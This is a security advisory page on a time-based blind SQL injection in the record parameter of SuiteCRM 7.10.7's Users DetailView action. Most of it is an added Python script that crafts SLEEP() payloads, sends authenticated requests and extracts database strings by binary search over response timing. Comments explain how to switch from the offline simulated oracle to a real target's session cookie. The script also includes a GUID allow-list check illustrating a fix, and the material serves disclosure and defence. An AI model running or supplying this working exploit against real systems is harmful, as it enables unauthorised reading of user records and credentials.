SuiteCRM SQL Injection Vulnerability in Users Module DetailView Action

Vulnerability

A time-based blind SQL injection vulnerability has been identified in SuiteCRM version 7.10.7. The issue resides in the record parameter of the Users module's DetailView action (index.php?module=Users&action=DetailView&record=...), where the supplied value reaches a database query without adequate sanitisation. An authenticated user can append SQL to the record parameter of a GET request to the index.php endpoint and, by observing response delays, extract database contents with time-based blind techniques.

Impact

Exploitation gives an authenticated attacker a time-based blind SQL injection primitive: no query output is returned to the browser, but by injecting conditional delays and timing the responses the attacker can infer database contents, including sensitive records such as user data, one bit at a time. Modifying data through this path would additionally require the database layer to accept stacked queries, which this advisory does not establish; reading data is the realistic impact.

Reproduction

To reproduce this vulnerability, log into SuiteCRM 7.10.7 with any valid account, open the Users module and load a record through the DetailView action. Note the normal response time for that request, then replace or extend the record parameter in the URL with a payload that introduces a conditional delay (for example a SLEEP() call on the MySQL/MariaDB backend SuiteCRM normally runs on). A response delayed by roughly the requested interval, observed repeatedly to rule out network jitter, indicates that the injected SQL was executed.
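The procedure above can be automated. The following Python script is an added example, not code from the advisory or from the SuiteCRM project: it builds the Users/DetailView URL, turns a SQL condition into a record value that delays the query only when the condition holds, and recovers a string one character at a time by binary search over the time oracle. The host name, the cookie handling, the quote context of the injection (a single-quoted string literal) and the SLEEP() function (MySQL/MariaDB) are assumptions; the advisory does not give the exact payload shape. The GUID check mirrors what a hardened DetailView should enforce before the record id reaches SQL (SuiteCRM record ids are 36-character GUIDs). A constructed SimulatedOracle stands in for the target so the logic runs offline.

```python
"""Time-based blind SQLi oracle for the SuiteCRM Users/DetailView record
parameter.  Added example; assumptions are marked in the comments."""
import functools
import re
import time
import urllib.parse
import urllib.request

BASE_URL = "http://suitecrm.example.test/index.php"  # placeholder host (assumption)
DELAY = 3                 # seconds the injected SLEEP() asks for
THRESHOLD = DELAY * 0.8   # elapsed time above this counts as "delayed"

# SuiteCRM record ids are lowercase 36-char GUIDs; this is the allow-list a
# fixed DetailView should apply to `record` before it is used in a query.
GUID_RE = re.compile(r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$")


def is_valid_record_id(value):
    """Defensive check: True only for a well-formed GUID, so any payload with
    quotes, spaces or SQL keywords is rejected before reaching the database."""
    return bool(GUID_RE.match(value))


def build_record_payload(condition):
    """Record value that makes the query sleep only when `condition` is true.
    Assumes the id lands inside a single-quoted string literal (assumption)."""
    return "' AND IF(({}),SLEEP({}),0) AND '1'='1".format(condition, DELAY)


def build_url(record_value):
    """Users module, DetailView action, attacker-controlled record parameter."""
    params = {"module": "Users", "action": "DetailView", "record": record_value}
    return BASE_URL + "?" + urllib.parse.urlencode(params)


def http_oracle(condition, cookie):
    """Send one authenticated request; True if the response was delayed."""
    req = urllib.request.Request(build_url(build_record_payload(condition)),
                                 headers={"Cookie": cookie})
    start = time.monotonic()
    with urllib.request.urlopen(req, timeout=DELAY * 4) as resp:
        resp.read()
    return time.monotonic() - start >= THRESHOLD


def extract_string(oracle, expression, max_len=64):
    """Recover the value of a SQL expression character by character.  Each
    character costs 7 oracle calls (binary search over ASCII 0..127); an
    ASCII value of 0 means we have read past the end of the string."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "ASCII(SUBSTRING(({}),{},1))>{}".format(expression, pos, mid)
            if oracle(cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


class SimulatedOracle:
    """Constructed stand-in for the target: evaluates the conditions that
    extract_string generates against a known secret, so the inference logic
    can be exercised without a live SuiteCRM instance."""
    COND_RE = re.compile(r"ASCII\(SUBSTRING\(\((.*)\),(\d+),1\)\)>(\d+)")

    def __init__(self, secret):
        self.secret = secret
        self.queries = 0

    def __call__(self, condition):
        self.queries += 1
        m = self.COND_RE.fullmatch(condition)
        pos, threshold = int(m.group(2)), int(m.group(3))
        code = ord(self.secret[pos - 1]) if pos <= len(self.secret) else 0
        return code > threshold


if __name__ == "__main__":
    # Offline demonstration against the constructed oracle.
    sim = SimulatedOracle("admin")
    print(extract_string(sim, "SELECT user_name FROM users LIMIT 1"), sim.queries, "requests")
    # Against a real target you would instead pass
    #   functools.partial(http_oracle, cookie="PHPSESSID=<your session>")
    # as the oracle, and raise DELAY if the link is noisy.
```

The binary search over the time oracle is what makes the technique practical: 7 timed requests per character instead of one per candidate value. Raise DELAY and repeat ambiguous measurements when the network is noisy, and note that is_valid_record_id rejects every payload the script produces, which is the property a fix for this parameter should have.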

Added: Apr 5, 2026, 9:20 PM
Updated: Apr 5, 2026, 9:20 PM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 3.1
exploitability: 6.6
remediation: 0.0
relevance: 5.3
threat: 6.4
urgency: 2.9
incentive: 0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.